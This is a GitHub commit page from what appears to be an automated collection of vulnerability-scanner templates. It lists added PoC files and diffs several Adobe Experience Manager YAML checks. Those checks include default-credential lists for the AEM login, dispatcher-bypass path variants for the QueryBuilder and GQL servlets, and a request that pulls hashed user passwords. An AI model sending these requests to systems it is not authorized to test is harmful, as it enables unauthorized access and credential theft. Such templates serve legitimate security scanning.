Skip to content

Commit

Permalink
20240921
Browse files Browse the repository at this point in the history
  • Loading branch information
actions-user committed Sep 21, 2024
1 parent 69d7702 commit c815775
Show file tree
Hide file tree
Showing 1,778 changed files with 105,601 additions and 436,790 deletions.
2 changes: 1 addition & 1 deletion date.txt
Original file line number Diff line number Diff line change
@@ -1 +1 @@
20240920
20240921
15 changes: 15 additions & 0 deletions poc.txt
Original file line number Diff line number Diff line change
Expand Up @@ -406,6 +406,7 @@
./poc/apache/apache-hadoop.yaml
./poc/apache/apache-haus.yaml
./poc/apache/apache-hbase-unauth.yaml
./poc/apache/apache-hertzbeat-default-login.yaml
./poc/apache/apache-http.yaml
./poc/apache/apache-httpd-conf-disclosure.yaml
./poc/apache/apache-httpd-conf-exposure.yml
Expand Down Expand Up @@ -1988,6 +1989,7 @@
./poc/auth/apache-flink-unauth-rce-359.yaml
./poc/auth/apache-flink-unauth-rce.yaml
./poc/auth/apache-hbase-unauth.yaml
./poc/auth/apache-hertzbeat-default-login.yaml
./poc/auth/apache-kylin-unauth-cve-2020-13937.yaml
./poc/auth/apache-kylin-unauth-cve-2020-13937.yml
./poc/auth/apache-nifi-api-unauthorized-access.yaml
Expand Down Expand Up @@ -6748,6 +6750,7 @@
./poc/backup/wpvivid-backuprestore-1756a86887229814cb1d125127366531.yaml
./poc/backup/wpvivid-backuprestore-19a73d6d3724e7282ebdb9f69d22604d.yaml
./poc/backup/wpvivid-backuprestore-209d3c1488f2fcc079d5a97d9d12b9ea.yaml
./poc/backup/wpvivid-backuprestore-213509c934588524ca1078ad32939ba4.yaml
./poc/backup/wpvivid-backuprestore-2e130d4ada04f07519235d645cb6333e.yaml
./poc/backup/wpvivid-backuprestore-3172d694e3441974b19aaa9fe10a7638.yaml
./poc/backup/wpvivid-backuprestore-3eeb6dc162eea6beff3be6abba85ec68.yaml
Expand Down Expand Up @@ -40897,6 +40900,7 @@
./poc/cve/CVE-2024-4409-bd7b37af206b0db99929fc562e902a9e.yaml
./poc/cve/CVE-2024-4409.yaml
./poc/cve/CVE-2024-4410-780bb42ca5b1f29027aeefa8dd4b3d38.yaml
./poc/cve/CVE-2024-4410-9f57beaac59e3f42047927d53bc728b4.yaml
./poc/cve/CVE-2024-4410.yaml
./poc/cve/CVE-2024-4411-6004580db2f1334f8d72709c050d45ba.yaml
./poc/cve/CVE-2024-4411.yaml
Expand Down Expand Up @@ -42647,6 +42651,7 @@
./poc/cve/CVE-2024-7304.yaml
./poc/cve/CVE-2024-7313-b762e54f8085d18804da0898542a5ec1.yaml
./poc/cve/CVE-2024-7313.yaml
./poc/cve/CVE-2024-7315-fca7053f6d8d3db3a989ec962d9eabd8.yaml
./poc/cve/CVE-2024-7317-ba5a614941cffb6dcbde33c96a783d3e.yaml
./poc/cve/CVE-2024-7317.yaml
./poc/cve/CVE-2024-7349-a333876f0ff61593d79b76123a7c37bd.yaml
Expand Down Expand Up @@ -42999,6 +43004,7 @@
./poc/cve/CVE-2024-8665.yaml
./poc/cve/CVE-2024-8669-48017cad1d0f5431615877a08826da9a.yaml
./poc/cve/CVE-2024-8669.yaml
./poc/cve/CVE-2024-8680-66081216a3685413779cdd14f0f9fe12.yaml
./poc/cve/CVE-2024-8714-03b5605b5eeba70097fb089d33700336.yaml
./poc/cve/CVE-2024-8714.yaml
./poc/cve/CVE-2024-8724-9019a55c2cb51d14586e3502543ceb09.yaml
Expand All @@ -43024,6 +43030,7 @@
./poc/cve/CVE-2024-8850-0902b81489aa227f3c7bf015ba1bc328.yaml
./poc/cve/CVE-2024-8850.yaml
./poc/cve/CVE-2024-8853-4af00fcf0e5fb8017cf4fcd8671e540c.yaml
./poc/cve/CVE-2024-8853.yaml
./poc/cve/CVE202127562-220331-222408.yaml
./poc/cve/CVE_2023_49442.yaml
./poc/cve/CVE_2023_51467.yaml
Expand Down Expand Up @@ -51022,6 +51029,7 @@
./poc/default/aolynk-br304-default-passwordl.yaml
./poc/default/apache-ambari-default-password.yaml
./poc/default/apache-ambari-default-password.yml
./poc/default/apache-hertzbeat-default-login.yaml
./poc/default/apisix-default-login-490.yaml
./poc/default/apisix-default-login-491.yaml
./poc/default/apisix-default-login-492.yaml
Expand Down Expand Up @@ -71462,6 +71470,7 @@
./poc/other/ds_store-7118.yaml
./poc/other/ds_store-7119.yaml
./poc/other/ds_store.yaml
./poc/other/dse855.yaml
./poc/other/dsgvo-youtube-ab2720de0d52a7fa9590416e9523d9f9.yaml
./poc/other/dsgvo-youtube.yaml
./poc/other/dsidxpress.yaml
Expand Down Expand Up @@ -78559,6 +78568,7 @@
./poc/other/klaviyo.yaml
./poc/other/kleeja.yaml
./poc/other/kloxo-single-server.yaml
./poc/other/klr300n-installer.yaml
./poc/other/klr300n-panel.yaml
./poc/other/kn-fix-your.yaml
./poc/other/knews-0a48a832408c3f273ceb312969a27b11.yaml
Expand Down Expand Up @@ -91975,6 +91985,7 @@
./poc/other/umami.yaml
./poc/other/umbraco-installer.yaml
./poc/other/umbraco-workflow.yaml
./poc/other/umbraco.yaml
./poc/other/unakit-323d31abc6d4119a0d2c31c24f9fc5bf.yaml
./poc/other/unakit.yaml
./poc/other/unaunthenticated-jenkin-10883.yaml
Expand Down Expand Up @@ -103778,6 +103789,7 @@
./poc/sql/CVE-2024-7258-ed6ffad18c93f5ae2665db7f4a1ac069.yaml
./poc/sql/CVE-2024-7301-b82f30bc7f77018db154ad54534c5d05.yaml
./poc/sql/CVE-2024-7302-b9e037a9c7ecf1544ad73a0b3afdbb7d.yaml
./poc/sql/CVE-2024-7315-fca7053f6d8d3db3a989ec962d9eabd8.yaml
./poc/sql/CVE-2024-7380-6a19e79de20767dbc62e297886ac1342.yaml
./poc/sql/CVE-2024-7390-c6e14cdb3bb6b824b90602f2e8d31a7e.yaml
./poc/sql/CVE-2024-7485-5e01bfd496bdbeeb312898de18c1a6e1.yaml
Expand Down Expand Up @@ -112425,6 +112437,7 @@
./poc/web/webmodule-ee-panel.yaml
./poc/web/webmodule-ee.yaml
./poc/web/webo-facto-connector-5ae10934efb8ea52876014a3550e9c28.yaml
./poc/web/webo-facto-connector.yaml
./poc/web/webp-converter-for-media-a33c88596c6b666a69762f624cf7c81b.yaml
./poc/web/webp-converter-for-media-fafd57d5d620d4b5b7c788994a8d0f33.yaml
./poc/web/webp-converter-for-media.yaml
Expand Down Expand Up @@ -113599,6 +113612,7 @@
./poc/wordpress/mailchimp-for-wp-3be37324efc4f836cfcad65b2f7e7178.yaml
./poc/wordpress/mailchimp-for-wp-446a759dfdab67da958d6e6c4909e9f8.yaml
./poc/wordpress/mailchimp-for-wp-4bb9c04b26a6c4bafa69175d618398cf.yaml
./poc/wordpress/mailchimp-for-wp-5e92f5fc00d315f48718ceff379ad83c.yaml
./poc/wordpress/mailchimp-for-wp-6af702232feff9587cc4ef43433a8de7.yaml
./poc/wordpress/mailchimp-for-wp-87f96db12ff152a4b841caf20ce3f1f9.yaml
./poc/wordpress/mailchimp-for-wp-88ba63d5419f4b1796d657e19efd74d1.yaml
Expand Down Expand Up @@ -120408,6 +120422,7 @@
./poc/wordpress/wpvivid-backuprestore-1756a86887229814cb1d125127366531.yaml
./poc/wordpress/wpvivid-backuprestore-19a73d6d3724e7282ebdb9f69d22604d.yaml
./poc/wordpress/wpvivid-backuprestore-209d3c1488f2fcc079d5a97d9d12b9ea.yaml
./poc/wordpress/wpvivid-backuprestore-213509c934588524ca1078ad32939ba4.yaml
./poc/wordpress/wpvivid-backuprestore-2e130d4ada04f07519235d645cb6333e.yaml
./poc/wordpress/wpvivid-backuprestore-3172d694e3441974b19aaa9fe10a7638.yaml
./poc/wordpress/wpvivid-backuprestore-3eeb6dc162eea6beff3be6abba85ec68.yaml
Expand Down
12 changes: 2 additions & 10 deletions poc/adobe/adobe-media-server.yaml
Original file line number Diff line number Diff line change
@@ -1,16 +1,10 @@
id: adobe-media-server

info:
name: Adobe Media Server Login Panel
name: Adobe Media Server
author: dhiyaneshDK
severity: info
description: An Adobe Media Server login panel was detected.
reference:
- https://helpx.adobe.com/support/adobe-media-server.html
classification:
cwe-id: CWE-200
metadata:
shodan-query: http.title:"Adobe Media Server"
reference: https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22
tags: panel,adobe

requests:
Expand All @@ -27,5 +21,3 @@ requests:
- type: status
status:
- 200

# Enhanced by mp on 2022/03/20
11 changes: 3 additions & 8 deletions poc/adobe/aem-crx-bypass.yaml
Original file line number Diff line number Diff line change
@@ -1,14 +1,11 @@
id: aem-crx-bypass

info:
name: AEM Package Manager - Authentication Bypass
author: dhiyaneshDK
description: Adobe Experience Manager Package Manager is susceptible to a hard to exploit authentication bypass issue. This issue only potentially impacts AEM on-premise or AEM as a Managed Service if default security configurations are removed.
name: AEM CRX Bypass
severity: critical
remediation: "Adobe recommends AEM customers review access controls for the CRX package manager path: /etc/packages."
reference:
- https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/
tags: aem,adobe
reference: https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/
tags: aem

requests:
- raw:
Expand Down Expand Up @@ -42,5 +39,3 @@ requests:
- type: status
status:
- 200

# Enhanced by mp on 2022/04/22
19 changes: 15 additions & 4 deletions poc/adobe/aem-default-get-servlet.yaml
Original file line number Diff line number Diff line change
@@ -1,15 +1,26 @@
id: aem-default-get-servlet

info:
author: DhiyaneshDk
name: AEM DefaultGetServlet
author: DhiyaneshDk
severity: low
reference: https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43
tags: aem

description: Sensitive information might be exposed via AEM DefaultGetServlet.
reference:
- https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43
- https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/GetServletExposed.java
tags: aem,adobe

requests:
- method: GET
path:
- '{{BaseURL}}/etc'
- '{{BaseURL}}/var'
- '{{BaseURL}}/apps'
- '{{BaseURL}}/home'
- '{{BaseURL}}///etc'
- '{{BaseURL}}///var'
- '{{BaseURL}}///apps'
- '{{BaseURL}}///home'
- '{{BaseURL}}/.json'
- '{{BaseURL}}/.1.json'
- '{{BaseURL}}/....4.2.1....json'
Expand Down
29 changes: 21 additions & 8 deletions poc/adobe/aem-default-login.yaml
Original file line number Diff line number Diff line change
@@ -1,11 +1,18 @@
id: aem-default-login

info:
name: Adobe AEM Default Login
author: random-robbie
severity: critical
severity: high
description: Adobe AEM default login credentials were discovered.
reference:
- https://experienceleague.adobe.com/docs/experience-manager-64/administering/security/security-checklist.html?lang=en
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
shodan-query: http.component:"Adobe Experience Manager"
tags: aem,default-login,adobe

requests:
- raw:
- |
Expand All @@ -16,31 +23,37 @@ requests:
Referer: {{BaseURL}}/libs/granite/core/content/login.html
_charset_=utf-8&j_username={{aem_user}}&j_password={{aem_pass}}&j_validate=true
attack: pitchfork
payloads:
aem_user:
- admin
- grios
- replication-receiver
- vgnadmin

- author
- anonymous
- [email protected]
- [email protected]
aem_pass:
- admin
- password
- replication-receiver
- vgnadmin

- author
- anonymous
- jdoe
- aparker
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
part: header
condition: and
words:
- login-token
- crx.default
condition: and

# Enhanced by mp on 2022/03/23
4 changes: 2 additions & 2 deletions poc/adobe/aem-detection.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -12,7 +12,7 @@ info:
- https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv
metadata:
shodan-query: http.component:"Adobe Experience Manager"
tags: aem,favicon,tech,adobe
tags: aem,favicon,tech

requests:
- method: GET
Expand All @@ -25,4 +25,4 @@ requests:
matchers:
- type: dsl
dsl:
- "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))"
- "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))"
36 changes: 3 additions & 33 deletions poc/adobe/aem-gql-servlet.yaml
Original file line number Diff line number Diff line change
@@ -1,47 +1,17 @@
id: aem-gql-servlet

info:
author: DhiyaneshDk
name: AEM GQLServlet
author: dhiyaneshDk,prettyboyaaditya
severity: low
reference:
- https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/reference-materials/javadoc/index.html?org/apache/jackrabbit/commons/query/GQL.html
reference: https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/reference-materials/javadoc/index.html?org/apache/jackrabbit/commons/query/GQL.html
tags: aem


requests:
- method: GET
path:
- '{{BaseURL}}/bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico'
- '{{BaseURL}}/bin/wcm/search/gql.servlet.json?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}/bin/wcm/search/gql.json?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}/bin/wcm/search/gql.json/a.1.json?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}/bin/wcm/search/gql.json/a.4.2.1...json?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}/bin/wcm/search/gql.json/a.css?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}/bin/wcm/search/gql.json/a.js?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}/bin/wcm/search/gql.json/a.ico?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}/bin/wcm/search/gql.json/a.png?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}/bin/wcm/search/gql.json/a.html?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}///bin///wcm///search///gql.servlet.json?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}///bin///wcm///search///gql.json?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}///bin///wcm///search///gql.json///a.1.json?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}///bin///wcm///search///gql.json///a.4.2.1...json?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}///bin///wcm///search///gql.json///a.css?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}///bin///wcm///search///gql.json///a.ico?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}///bin///wcm///search///gql.json///a.png?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}///bin///wcm///search///gql.json///a.js?query=type:base%20limit:..1&pathPrefix='
- '{{BaseURL}}///bin///wcm///search///gql.json///a.html?query=type:base%20limit:..1&pathPrefix='

stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
Expand Down
3 changes: 0 additions & 3 deletions poc/adobe/aem-groovyconsole.yaml
Original file line number Diff line number Diff line change
@@ -1,12 +1,10 @@
id: aem-groovyconsole

info:
name: AEM Groovy console exposed
author: d3sca
severity: critical
description: Groovy console is exposed.
tags: aem

requests:
- method: GET
path:
Expand All @@ -16,7 +14,6 @@ requests:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US,en;q=0.9,hi;q=0.8
User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36

matchers-condition: and
matchers:
- type: word
Expand Down
9 changes: 4 additions & 5 deletions poc/adobe/aem-hash-querybuilder-161.yaml
Original file line number Diff line number Diff line change
@@ -1,29 +1,28 @@
id: aem-hash-querybuilder

info:
author: DhiyaneshDk
name: Query hashed password via QueryBuilder Servlet
severity: medium
reference: https://twitter.com/AEMSecurity/status/1372392101829349376
tags: aem

requests:
- raw:
- |
GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- '"success":true'
- 'rep:password'
condition: and
Loading

0 comments on commit c815775

Please sign in to comment.